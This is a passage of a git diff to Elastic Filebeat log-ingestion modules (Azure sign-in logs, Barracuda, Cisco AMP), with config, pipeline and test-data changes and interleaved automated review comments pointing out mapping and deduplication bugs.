John","userId":"762a6171-29d0-456b-b88b-ca7f7d99728d","userPrincipalName":"john.doe@example.com","userType":"Member"},"resourceId":"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam","resultSignature":"None","resultType":"0","tenantId":"19aa547c-22ab-606d-a4b6-541c5ce52b71","time":"2021-01-26T13:39:55.7863053Z"} 
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json index 75e6eb05bb2..195e52807f3 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json +++ b/x-pack/filebeat/module/azure/signinlogs/test/signinlogs.log-expected.json 
@@ -166,5 +166,218 @@ "user.full_name": "Test LTest", "user.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", "user.name": "c3813493-bf92-5123-2717-8a8b2979c38b" + }, + { + "@timestamp": "2021-01-26T13:39:55.786Z", + "azure.correlation_id": "1ba108d9-9609-48be-baee-afc0885baa06", + "azure.resource.id": "/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam", + "azure.resource.provider": "Microsoft.aadiam", + "azure.signinlogs.category": "SignInLogs", + "azure.signinlogs.identity": "Doe, John", + "azure.signinlogs.operation_name": "Sign-in activity", + "azure.signinlogs.operation_version": "1.0", + "azure.signinlogs.properties.app_display_name": "Office365 Shell WCSS-Client", + "azure.signinlogs.properties.app_id": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", + "azure.signinlogs.properties.applied_conditional_access_policies": [ + { + "conditionsNotSatisfied": 2, + "conditionsSatisfied": 1, + "displayName": "On-Prem Access Only", + "enforcedGrantControls": [ + "Block" + ], + "enforcedSessionControls": [], + "id": "123ebbf1-e868-4a77-bfd9-b59bd6c2412e", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 0, + "conditionsSatisfied": 0, + "displayName": "ForceMFAfor B2C", + "enforcedGrantControls": [], + "enforcedSessionControls": [], + "id": "0dff3d49-001e-413f-86eb-2800e789674c", + "result": "notEnabled" + }, + { + "conditionsNotSatisfied": 2, + "conditionsSatisfied": 1, + "displayName": "Baseline policy: Require MFA for admins", + "enforcedGrantControls": [ + "Mfa" + ], + "enforcedSessionControls": [], + "id": "a5527e71-9da1-41d0-859b-7ca84dae03a7", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 2, + "conditionsSatisfied": 1, + "displayName": "Baseline Policy: Blocks legacy authentication", + "enforcedGrantControls": [ + "Block" + ], + "enforcedSessionControls": [], + "id": "c1311105-97ac-4ebd-a866-5b215d066765", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 1, + "conditionsSatisfied": 0, + "displayName": "Netscaler 
MFA", + "enforcedGrantControls": [ + "Mfa" + ], + "enforcedSessionControls": [ + "SignInFrequency" + ], + "id": "ee756a5f-8c3b-41eb-8ace-0839597f718a", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 8, + "conditionsSatisfied": 19, + "displayName": "Enforce Verification on External Access", + "enforcedGrantControls": [ + "Mfa" + ], + "enforcedSessionControls": [ + "SignInFrequency" + ], + "id": "913f5adc-cd20-4b35-93b8-fbe145f68444", + "result": "notApplied" + }, + { + "conditionsNotSatisfied": 2, + "conditionsSatisfied": 1, + "displayName": "Test Policy", + "enforcedGrantControls": [ + "Mfa" + ], + "enforcedSessionControls": [], + "id": "cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa", + "result": "notApplied" + } + ], + "azure.signinlogs.properties.authentication_details": [ + { + "RequestSequence": 0, + "StatusSequence": 0, + "authenticationMethod": "Previously satisfied", + "authenticationStepDateTime": "2021-01-26T13:39:55.7863053+00:00", + "authenticationStepRequirement": "Primary authentication", + "authenticationStepResultDetail": "First factor requirement satisfied by claim in the token", + "succeeded": true + } + ], + "azure.signinlogs.properties.authentication_processing_details": [ + { + "key": "Domain Hint Present", + "value": "True" + }, + { + "key": "Login Hint Present", + "value": "True" + }, + { + "key": "Private Link Id", + "value": "0" + }, + { + "key": "Azure AD App Authentication Library", + "value": "Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS" + }, + { + "key": "IsCAEToken", + "value": "False" + } + ], + "azure.signinlogs.properties.authentication_requirement": "singleFactorAuthentication", + "azure.signinlogs.properties.authentication_requirement_policies": [], + "azure.signinlogs.properties.client_app_used": "Browser", + "azure.signinlogs.properties.conditional_access_status": "success", + "azure.signinlogs.properties.correlation_id": "1ba108d9-9609-48be-baee-afc0885baa06", + "azure.signinlogs.properties.created_at": 
"2021-01-26T13:39:55.7863053+00:00", + "azure.signinlogs.properties.device_detail.browser": "Chrome 87.0.4280", + "azure.signinlogs.properties.device_detail.device_id": "", + "azure.signinlogs.properties.device_detail.operating_system": "Windows 10", + "azure.signinlogs.properties.flagged_for_review": false, + "azure.signinlogs.properties.id": "a9222177-db03-40ef-9b86-5b207ed72000", + "azure.signinlogs.properties.ip_address": "192.168.108.29", + "azure.signinlogs.properties.is_interactive": true, + "azure.signinlogs.properties.network_location_details": [], + "azure.signinlogs.properties.original_request_id": "a9222177-db03-40ef-9b86-5b207ed72000", + "azure.signinlogs.properties.processing_time_ms": 162, + "azure.signinlogs.properties.resource_display_name": "Microsoft Graph", + "azure.signinlogs.properties.resource_id": "00000003-0000-0000-c000-000000000000", + "azure.signinlogs.properties.resource_tenant_id": "19aa547c-22ab-606d-a4b6-541c5ce52b71", + "azure.signinlogs.properties.risk_detail": "none", + "azure.signinlogs.properties.risk_event_types": [], + "azure.signinlogs.properties.risk_event_types_v2": [], + "azure.signinlogs.properties.risk_level_aggregated": "none", + "azure.signinlogs.properties.risk_level_during_signin": "none", + "azure.signinlogs.properties.risk_state": "none", + "azure.signinlogs.properties.service_principal_id": "", + "azure.signinlogs.properties.status.error_code": 0, + "azure.signinlogs.properties.token_issuer_name": "", + "azure.signinlogs.properties.token_issuer_type": "AzureAD", + "azure.signinlogs.properties.user_display_name": "Doe, John", + "azure.signinlogs.properties.user_id": "762a6171-29d0-456b-b88b-ca7f7d99728d", + "azure.signinlogs.properties.user_principal_name": "john.doe@example.com", + "azure.signinlogs.properties.user_type": "Member", + "azure.signinlogs.result_signature": "None", + "azure.signinlogs.result_type": "0", + "azure.tenant_id": "19aa547c-22ab-606d-a4b6-541c5ce52b71", + "client.ip": "8.8.8.8", + 
"cloud.provider": "azure", + "event.action": "Sign-in activity", + "event.category": [ + "authentication" + ], + "event.dataset": "azure.signinlogs", + "event.duration": 0, + "event.kind": "event", + "event.module": "azure", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"durationMs\":0,\"identity\":\"Doe, John\",\"location\":\"US\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office365 Shell WCSS-Client\",\"appId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"On-Prem Access Only\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"123ebbf1-e868-4a77-bfd9-b59bd6c2412e\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":0,\"displayName\":\"ForceMFAfor B2C\",\"enforcedGrantControls\":[],\"enforcedSessionControls\":[],\"id\":\"0dff3d49-001e-413f-86eb-2800e789674c\",\"result\":\"notEnabled\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline policy: Require MFA for admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"a5527e71-9da1-41d0-859b-7ca84dae03a7\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Baseline Policy: Blocks legacy authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"c1311105-97ac-4ebd-a866-5b215d066765\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"Netscaler MFA\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"ee756a5f-8c3b-41eb-8ace-0839597f718a\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":8,\"conditionsSatisfied\":19,\"displayName\":\"Enforce 
Verification on External Access\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[\"SignInFrequency\"],\"id\":\"913f5adc-cd20-4b35-93b8-fbe145f68444\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"Test Policy\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"cf0d2cec-b974-4fd3-a1d3-da4ae1e896fa\",\"result\":\"notApplied\"}],\"authenticationDetails\":[{\"RequestSequence\":0,\"StatusSequence\":0,\"authenticationMethod\":\"Previously satisfied\",\"authenticationStepDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"authenticationStepRequirement\":\"Primary authentication\",\"authenticationStepResultDetail\":\"First factor requirement satisfied by claim in the token\",\"succeeded\":true}],\"authenticationProcessingDetails\":[{\"key\":\"Domain Hint Present\",\"value\":\"True\"},{\"key\":\"Login Hint Present\",\"value\":\"True\"},{\"key\":\"Private Link Id\",\"value\":\"0\"},{\"key\":\"Azure AD App Authentication Library\",\"value\":\"Family: ADAL Library: ADAL.Js 1.0.15 Platform: JS\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"1ba108d9-9609-48be-baee-afc0885baa06\",\"createdDateTime\":\"2021-01-26T13:39:55.7863053+00:00\",\"deviceDetail\":{\"browser\":\"Chrome 87.0.4280\",\"deviceId\":\"\",\"operatingSystem\":\"Windows 10\"},\"flaggedForReview\":false,\"id\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"ipAddress\":\"192.168.108.29\",\"isInteractive\":true,\"location\":{\"city\":\"Pierre\",\"countryOrRegion\":\"US\",\"geoCoordinates\":{\"latitude\":44.567081451416016,\"longitude\":-100.26722717285156},\"state\":\"South 
Dakota\"},\"networkLocationDetails\":[],\"originalRequestId\":\"a9222177-db03-40ef-9b86-5b207ed72000\",\"processingTimeInMilliseconds\":162,\"resourceDisplayName\":\"Microsoft Graph\",\"resourceId\":\"00000003-0000-0000-c000-000000000000\",\"resourceTenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\",\"userDisplayName\":\"Doe, John\",\"userId\":\"762a6171-29d0-456b-b88b-ca7f7d99728d\",\"userPrincipalName\":\"john.doe@example.com\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/19aa547c-22ab-606d-a4b6-541c5ce52b71/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"19aa547c-22ab-606d-a4b6-541c5ce52b71\",\"time\":\"2021-01-26T13:39:55.7863053Z\"}", + "event.outcome": "success", + "event.type": [ + "info" + ], + "fileset.name": "signinlogs", + "geo.city_name": "Pierre", + "geo.country_iso_code": "US", + "geo.country_name": "South Dakota", + "geo.location.lat": 44.567081451416016, + "geo.location.lon": -100.26722717285156, + "input.type": "log", + "log.level": 4, + "log.offset": 3390, + "related.ip": [ + "8.8.8.8" + ], + "service.type": "azure", + "source.as.number": 15169, + "source.as.organization.name": "Google LLC", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 37.751, + "source.geo.location.lon": -97.822, + "source.ip": "8.8.8.8", + "tags": [ + "forwarded" + ], + "user.domain": "example.com", + "user.full_name": "Doe, John", + "user.id": "762a6171-29d0-456b-b88b-ca7f7d99728d", + "user.name": "john.doe", 
+ "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", + "user_agent.name": "Chrome", + "user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36", + "user_agent.os.full": "Windows 10", + "user_agent.os.name": "Windows", + "user_agent.os.version": "10", + "user_agent.version": "87.0.4280.141" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml b/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml index f4f33a69fe8..52dcb6a548d 100644 --- a/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml +++ b/x-pack/filebeat/module/barracuda/spamfirewall/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/barracuda/spamfirewall/test/generated.log-expected.json b/x-pack/filebeat/module/barracuda/spamfirewall/test/generated.log-expected.json index e9af3c2a3d1..504e985950a 100644 --- a/x-pack/filebeat/module/barracuda/spamfirewall/test/generated.log-expected.json +++ b/x-pack/filebeat/module/barracuda/spamfirewall/test/generated.log-expected.json @@ -872,8 +872,8 @@ "observer.type": "Anti-Virus", "observer.vendor": "Barracuda", "related.hosts": [ - "lit5929.test", - "hitect" + "hitect", + "lit5929.test" ], "related.ip": [ "10.198.6.166" @@ -1008,8 +1008,8 @@ "observer.type": "Anti-Virus", "observer.vendor": "Barracuda", "related.hosts": [ - "vitaedi", - "neav6028.internal.domain" + "neav6028.internal.domain", + "vitaedi" ], "related.ip": [ "10.128.114.77" @@ -3159,8 +3159,8 @@ "observer.type": "Anti-Virus", "observer.vendor": "Barracuda", "related.ip": [ - "10.1.6.115", - "10.178.30.158" + "10.178.30.158", + "10.1.6.115" ], "rsa.internal.messageid": "outbound/smtp", "rsa.investigations.event_cat": 1901000000, 
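Review bot: In the record added to signinlogs.log-expected.json, `"geo.country_name": "South Dakota"` holds the value of `properties.location.state`, while the same event gives `countryOrRegion` as `US` and `geo.country_iso_code` is `US`. The ingest pipeline that produces this file is not in the hunk, so this is inferred, but it looks as if the state is being written to the country field; ECS keeps a state or province in `geo.region_name`. Sign-in geography is commonly used for location-based detections, so I would correct the mapping in the pipeline and regenerate the file so that the record reads `"geo.region_name": "South Dakota"`.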
@@ -3269,8 +3269,8 @@ "observer.type": "Anti-Virus", "observer.vendor": "Barracuda", "related.hosts": [ - "piciatis2460.api.host", - "der" + "der", + "piciatis2460.api.host" ], "related.ip": [ "10.77.182.191" diff --git a/x-pack/filebeat/module/barracuda/waf/config/input.yml b/x-pack/filebeat/module/barracuda/waf/config/input.yml index 26be6dda115..5ec637436f5 100644 --- a/x-pack/filebeat/module/barracuda/waf/config/input.yml +++ b/x-pack/filebeat/module/barracuda/waf/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/bluecoat/director/config/input.yml b/x-pack/filebeat/module/bluecoat/director/config/input.yml index a907db353bb..8ce114c4bad 100644 --- a/x-pack/filebeat/module/bluecoat/director/config/input.yml +++ b/x-pack/filebeat/module/bluecoat/director/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cef/log/config/input.yml b/x-pack/filebeat/module/cef/log/config/input.yml index 7916908599e..f6f9ffc4bb8 100644 --- a/x-pack/filebeat/module/cef/log/config/input.yml +++ b/x-pack/filebeat/module/cef/log/config/input.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml b/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml index 1925a535c24..cc5e898bba9 100644 --- a/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml +++ b/x-pack/filebeat/module/checkpoint/firewall/config/firewall.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_zones }} - add_fields: target: _temp_ 
diff --git a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml index de20fe61484..ff246eeaa45 100644 --- a/x-pack/filebeat/module/cisco/amp/_meta/fields.yml +++ b/x-pack/filebeat/module/cisco/amp/_meta/fields.yml @@ -160,7 +160,7 @@ description: > SHA1 hash of the archived file related to the malicious event. - - name: file.archived_file.identify.sha256 + - name: file.archived_file.identity.sha256 type: keyword description: > SHA256 hash of the archived file related to the malicious event. @@ -265,7 +265,27 @@ description: > List of all MITRE tactics related to the incident found. + - name: mitre_tactics + type: keyword + description: > + Array of all related mitre tactic ID's + - name: techniques type: flattened description: > - List of all MITRE techniques related to the incident found. \ No newline at end of file + List of all MITRE techniques related to the incident found. + + - name: mitre_techniques + type: keyword + description: > + Array of all related mitre technique ID's + + - name: command_line.arguments + type: keyword + description: > + The CLI arguments related to the Cloud Threat IOC reported by Cisco. + + - name: bp_data + type: flattened + description: > + Endpoint isolation information \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/config/config.yml b/x-pack/filebeat/module/cisco/amp/config/config.yml index 8e4695d7458..27fe480ba84 100644 --- a/x-pack/filebeat/module/cisco/amp/config/config.yml +++ b/x-pack/filebeat/module/cisco/amp/config/config.yml @@ -17,6 +17,9 @@ request.timeout: {{ .request_timeout }} {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.start_date 
@@ -61,17 +64,17 @@ processors: - decode_json_fields: fields: [message] target: json - - if: - has_fields: ["json.data.id"] - then: - - fingerprint: - fields: ["json.data.id"] - target_field: "@metadata._id" - else: - - fingerprint: - fields: ["json.data.timestamp", "json.data.event_type_id", "json.data.connector_guid"] - target_field: "@metadata._id" + - fingerprint: + fields: + - "json.data.timestamp" + - "json.data.timestamp_nanoseconds" + - "json.data.event_type_id" + - "json.data.connector_guid" + - "json.data.id" + - "json.data.detection_id" + target_field: "@metadata._id" + ignore_missing: true - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml index b77c3be1f9c..b75214cc297 100644 --- a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml +++ b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml @@ -76,6 +76,15 @@ processors: ignore_failure: true if: ctx?.cisco?.amp?.start_timestamp != null +- rename: + field: cisco.amp.techniques + target_field: cisco.amp.mitre_techniques + if: "ctx?.cisco?.amp?.techniques != null && ctx?.cisco?.amp?.techniques.length > 0 && ctx?.cisco?.amp?.techniques[0] instanceof String" +- rename: + field: cisco.amp.tactics + target_field: cisco.amp.mitre_tactics + if: "ctx?.cisco?.amp?.tactics != null && ctx?.cisco?.amp?.tactics.length > 0 && ctx?.cisco?.amp?.tactics[0] instanceof String" + ###################### ## ECS Host Mapping ## ###################### @@ -189,6 +198,10 @@ processors: field: cisco.amp.file.parent.process_id target_field: process.pid ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.process_id + target_field: process.pid + ignore_missing: true - rename: field: cisco.amp.file.parent.file_name target_field: process.name 
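Review bot: With `ignore_missing: true` on the new `fingerprint` processor in config.yml (`@@ -61,17 +64,17 @@`), an event in which none of the six `json.data.*` fields is present, for example when `decode_json_fields` could not parse `message`, would as far as I can tell still receive an `@metadata._id`, and every such event would receive the same one. Because that value becomes the document id, those events would overwrite one another in the index instead of being stored separately, which silently loses endpoint events. I would keep the wider field list but add a `when` condition with `has_fields: ["json.data.timestamp"]` to the processor, so that events without the expected payload fall back to an auto-generated id.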
@@ -205,10 +218,9 @@ processors: field: cisco.amp.file.parent.identity.md5 target_field: process.hash.md5 ignore_missing: true - - rename: - field: cisco.amp.network_info.parent.process_id - target_field: process.pid + field: cisco.amp.file.parent.identity.md5 + target_field: process.hash.md5 ignore_missing: true - rename: field: cisco.amp.network_info.parent.file_name @@ -300,21 +312,39 @@ processors: value: "{{ cisco.amp.computer.external_ip }}" if: ctx?.cisco?.amp?.computer?.external_ip != null allow_duplicates: false -- foreach: - field: cisco.amp.computer.network_addresses - processor: - append: - field: related.ip - value: "{{ _ingest._value.ip }}" - allow_duplicates: false +- script: + lang: painless + source: | + if (ctx?.related == null) { + ctx.related = new HashMap(); + } + if (ctx?.related?.ip == null) { + ctx.related.ip = new ArrayList(); + } + for (addr in ctx?.cisco?.amp?.computer?.network_addresses) { + if (addr.ip != null && !addr.ip.isEmpty()) { + if (!ctx?.related?.ip.contains(addr.ip)) { + ctx?.related?.ip.add(addr.ip); + } + } + } if: ctx?.cisco?.amp?.computer?.network_addresses != null -- foreach: - field: cisco.amp.computer.network_addresses - processor: - append: - field: cisco.amp.related.mac - value: "{{ _ingest._value.mac }}" - allow_duplicates: false +- script: + lang: painless + source: | + if (ctx?.cisco?.amp?.related == null) { + ctx.cisco.amp.related = new HashMap(); + } + if (ctx?.cisco?.amp?.related?.mac == null) { + ctx.cisco.amp.related.mac = new ArrayList(); + } + for (addr in ctx?.cisco?.amp?.computer?.network_addresses) { + if (addr.mac != null && !addr.mac.isEmpty()) { + if (!ctx?.cisco?.amp?.related?.mac.contains(addr.mac)) { + ctx?.cisco?.amp?.related?.mac.add(addr.mac); + } + } + } if: ctx?.cisco?.amp?.computer?.network_addresses != null - foreach: field: cisco.amp.vulnerabilities diff --git a/x-pack/filebeat/module/cisco/amp/manifest.yml b/x-pack/filebeat/module/cisco/amp/manifest.yml index 9458f80a17d..1c3b263d34c 100644 
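Review bot: The rename added in pipeline.yml at `@@ -205,10 +218,9 @@` repeats the processor directly above it: both move `cisco.amp.file.parent.identity.md5` to `process.hash.md5`. Once the first has run the source field no longer exists, so the second passes only because of `ignore_missing: true` and never does anything. It reads like a leftover from moving the `cisco.amp.network_info.parent.process_id` rename up into the `@@ -189,6 +198,10 @@` hunk; I would delete the duplicate `- rename:` entry, or name the intended source field if a different one was meant. The processor list continues outside the hunk.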
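Review bot: Both `script` processors added in pipeline.yml at `@@ -300,21 +312,39 @@` create their target list before the loop, so an event whose `network_addresses` entries all carry an empty `ip` or `mac` ends up with an empty `related.ip` or `cisco.amp.related.mac` array that the `foreach` version did not create on its own. Creating the list only when a value is about to be added avoids that, e.g. `if (ctx.related.ip == null) { ctx.related.ip = new ArrayList(); }` placed just before the `add` call inside the loop. Neither script shows `ignore_failure` or an `on_failure` handler in the hunk, so an entry of an unexpected shape would fail the processor; whether the pipeline defines a global handler is not visible here.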
--- a/x-pack/filebeat/module/cisco/amp/manifest.yml +++ b/x-pack/filebeat/module/cisco/amp/manifest.yml @@ -18,6 +18,7 @@ var: default: 24h - name: interval default: 60m + - name: proxy_url ingest_pipeline: - ingest/pipeline.yml diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log deleted file mode 100644 index 14599ecfc0c..00000000000 --- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log +++ /dev/null 
@@ -1,8 +0,0 @@ -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":153000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.22gp.1201","detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"user@domain","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:ac:af:1d:ad"},{"ip":"192.168.120.1","mac":"12:24:56:c2:00:01"},{"ip":"192.168.160.1","mac":"12:50:56:c2:53:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","file_name":"HYXiN3hY.exe.part","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part","identity":{"sha256":"e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc","sha1":"d0c4192b65e36553fvfd2b83f3113f6ae8390baa","md5":"9a8557b98ed1469272fa0ace91d63477"},"parent":{"process_id":88,"disposition":"Unknown","file_name":"firefox.exe","identity":{"sha256":"a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab","sha1":"d539afb0991e823c7cdf824b610a5a5d7655a2da","md5":"e50ab86d5409d4d0ad386b27ea7f78fb"}}}}} -{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":163000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:bb:af:22:fd"},{"ip":"192.168.120.1","mac":"00:52:12:c0:11:01"},{"ip":"192.168.160.1","mac":"01:51:56:c0:c2:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","identity":{"sha256":"e678899d7ea9702184167b56655f91a69f8a0bdc9df65612762252c053c2cd7c"}}}} -{"data":{"id":123578990,"timestamp":1605085728,"timestamp_nanoseconds":183000000,"date":"2020-11-11T09:08:48+00:00","event_type":"Exploit 
Prevention","event_type_id":1090519103,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"uuser@domain","active":true,"network_addresses":[{"ip":"192.1.1.1","mac":"av:1d:13:a2:21:1f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235","trajectory":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","identity":{"sha256":"2262a4766bc394b4cb2d658144b207183ff23a3039121cd74e615ab64e6e57d6","sha1":"22643e8613bb0dd90888b17367007489fe16693e4","md5":"bcc2a6493e0641bb1e60cbf640169e579"},"parent":{"process_id":7328,"disposition":"Unknown","file_name":"OfficeSetup.exe","identity":{"sha256":"a6d1aa0df1c23eb8b7563245082ed2eddf00e3da62cbeb41ac701123vasce927f465d","sha1":"90d3a389307ag2a7fbv8726502077b69ab0fd79a0","md5":"6a262b4af012ec81ffeb36f5faf70311"}},"attack_details":{"application":"powershell.exe","attacked_module":"Script Control:System.Management.Automation.dll","base_address":"0x000F0000","suspicious_files":[""],"indicators":[{"MITRE_Tactic":[{"tactic_id":"TA0002","name":"Execution"}],"severity":"medium","description":"A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. 
Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.","short_description":"Excessively long PowerShell command detected","id":123578990,"MITRE_Technique":[{"tehcnique_id":"T1086","name":"PowerShell","technique_id":"T1086"}]}]}}}} -{"data":{"id":123578990,"timestamp":1605084750,"timestamp_nanoseconds":736000000,"date":"2020-11-11T08:52:30+00:00","event_type":"File Fetch Failed","event_type_id":2164260910,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"error":{"error_code":3240099848,"description":"File not 